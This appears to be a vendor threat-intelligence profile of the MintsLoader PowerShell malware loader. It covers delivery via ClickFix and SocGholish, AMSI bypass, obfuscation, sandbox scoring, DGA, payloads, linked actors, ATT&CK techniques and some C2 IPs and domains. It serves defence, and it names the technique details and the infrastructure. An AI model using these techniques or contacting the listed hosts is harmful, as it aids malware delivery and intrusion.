MintsLoader
MintsLoader is a PowerShell-based, multi-stage malware loader, also tracked in the provided content as TAG-124, LandUpdate808, and UNC4108. It has been observed since at least February 2023 and became more widespread from mid-2024 onward. The malware affects Windows endpoints and is used to stage follow-on payloads rather than provide extensive standalone functionality.
The reported delivery chains include multi-stage JavaScript-to-PowerShell execution, phishing attachments, ClickFix-style social engineering, and compromised-website delivery via SocGholish/FakeUpdates. Observed phishing lures included invoice-themed campaigns, including JScript attachments such as Italian invoice-themed files. ClickFix and KongTuke-related lures instructed victims to paste commands into the Windows Run dialog, including abuse of the legitimate Microsoft-signed finger.exe LOLBin to retrieve and execute additional stages. SocGholish has also been observed delivering MintsLoader through fake browser update overlays on compromised websites.
Capabilities and behavior described in the content include AMSI bypass, arithmetic and hashtable-based string obfuscation, reflective loading of Base64-encoded Gzip-compressed .NET assemblies, WMI-based anti-sandbox and environment scoring, and use of multiple domain generation algorithms, including date-seeded DGA logic, to resolve command-and-control infrastructure. The malware selectively withholds real payloads from sandbox or virtualized environments and may instead deliver decoy payloads such as AsyncRAT. Researchers also reported daily-changing C2 domains and more than 200 DGA domains across multiple clusters.
MintsLoader is primarily associated with delivery of GhostWeaver, a PowerShell RAT, and the content describes GhostWeaver as tightly integrated with MintsLoader, including cases where MintsLoader profiles targets before GhostWeaver deployment. Additional payloads mentioned in the content include StealC, modified BOINC clients, LockBit, RansomHub, AsyncRAT, NetSupport RAT, and in some reporting Broomstick or WarmCookie. Orange Cyberdefense observed SocGholish infections delivering loaders such as MintsLoader that led to GhostWeaver, LockBit, RansomHub, AsyncRAT, and NetSupport RAT.
The malware is linked in the content to multiple threat actors and ecosystems. TAG-124/LandUpdate808 is identified as the primary sustained operator. SocGholish/TA569 is described as an early adopter that used MintsLoader as an alternative delivery chain around July 2024. KongTuke is also reported to use MintsLoader among other loaders and tooling, and TA582 is described as using MintsLoader to score targets before delivering GhostWeaver to real machines while serving decoys to sandboxes.
Targeting described in the content includes industrial, legal, and energy organizations in the United States and Europe. High-confidence infrastructure details directly mentioned include active C2 clusters at 178.156.128.182 and 86.107.101.93, and observed delivery-related domains or hosts such as humver[.]top, cfcheckver[.]top, and 91.193.19[.]108 in ClickFix activity. The content also notes that experts shared up-to-date C2 domains and other artifacts related to recent MintsLoader attacks.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
KongTuke has also been seen using a wider kit, including WinPython, Node.js, finger.exe, a fake NexShield browser extension, the encrypted GateKeeper .NET payload, and loaders like MintsLoader and D3F@ck Loader.
KongTuke has also been seen using a wider kit, including WinPython, Node.js, finger.exe, a fake NexShield browser extension, the encrypted GateKeeper .NET payload, and loaders like MintsLoader and D3F@ck Loader.
MintsLoader (TAG-124 / LandUpdate808 / UNC4108) Type: Malware Loader - PowerShell-based, multi-stage delivery platform
MintsLoader (TAG-124 / LandUpdate808 / UNC4108) Type: Malware Loader - PowerShell-based, multi-stage delivery platform
Another recently observed customer of TA569 is the MintsLoader malware family... UNC4108 utilizes MintsLoader to deploy various payloads...
Before the RAT arrives, a profiler called MintsLoader runs three checks on the target machine... When we submitted the delivery URLs to a sandbox, the server connected but withheld the payload.
Techniques & procedures
20 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
4 techniques
Initial Access
SocGholish is a JavaScript (JS)-based downloader malware that's distributed via compromised websites by masquerading as deceptive updates for web browsers like Google Chrome or Mozilla Firefox, and other popular software.
A typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure... Microsoft Threat Intelligence first observed the use of the ClickFix technique between March and June 2024 in email campaigns sent by a threat actor we track as Storm-1607.
Execution
4 techniques
Execution
In each case the victim is ultimately tricked into running an attacker-supplied PowerShell command... Once a command is executed, a multi-stage PowerShell chain downloads and unpacks a portable WinPython environment and launches the ModeloRAT Python scripts.
"Whatever text that server returns is then piped straight into cmd for immediate execution."
ClickFix... fake error or fake CAPTCHA tests to trick users into pasting malicious scripts into the Windows Run dialog... FileFix... manually pasting and executing malicious commands... CrashFix... trick them into manually executing code... In each case the victim is ultimately tricked into running an attacker-supplied PowerShell command.
Privilege Escalation
1 technique
Privilege Escalation
Stealth
7 techniques
Stealth
Obfuscation uses arithmetic character encoding where every string is constructed via math expressions without [char] casts: @((8306-8191),(7691-7583),...) -join '' .
However, whether the malware is on disk or in memory, we’ve observed its code injected into LOLBins, such as msbuild.exe, regasm.exe, or powershell.exe.
HTTP response returns Base64-encoded, XOR-decoded payload. Once decoded and decompressed, heavily obfuscated PowerShell bypasses AMSI
These abuse finger.exe - a legitimate Microsoft-signed binary from the obsolete Finger protocol. It remains on modern Windows, is rarely monitored, and can make outbound network connections. The piped output goes directly to cmd for execution.
"including sandbox detection, virtual machine detection" / "Checks for virtual machine/sandbox environments using obscure logic and system metadata"
Step 3 - Evasion: WMI Environment Scoring Three WMI checks produce a cumulative score determining whether C2 serves real payload or decoy.
"...executed it in memory..."; "...keeping the entire chain in memory..."; "...runs the returned PowerShell directly in memory." | "A base64-encoded, Gzip-compressed .NET assembly was unpacked in memory and invoked via reflection."; "...loads... using System.Reflection.Assembly::Load ... identifies its Main method and invokes it via reflection..."
Discovery
2 techniques
Discovery
Command and Control
4 techniques
Command and Control
Once active, SocGholish connects to its C2 infrastructure and deploys a variety of second-stage payloads.
"...PHP based staging via a 1.php?s=<GUID> endpoint..."; "...request to the /st2 path..."
IOCs tracked for this family
72 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
34 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A loader used in the broader KongTuke/Woodgnat toolset as part of flexible malware delivery methods.
A malware loader used by KongTuke to deliver additional payloads.
A commodity loader used to stage follow-on payloads in Woodgnat-linked attack chains.
A commodity loader used in Woodgnat attack chains to stage follow-on payloads.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.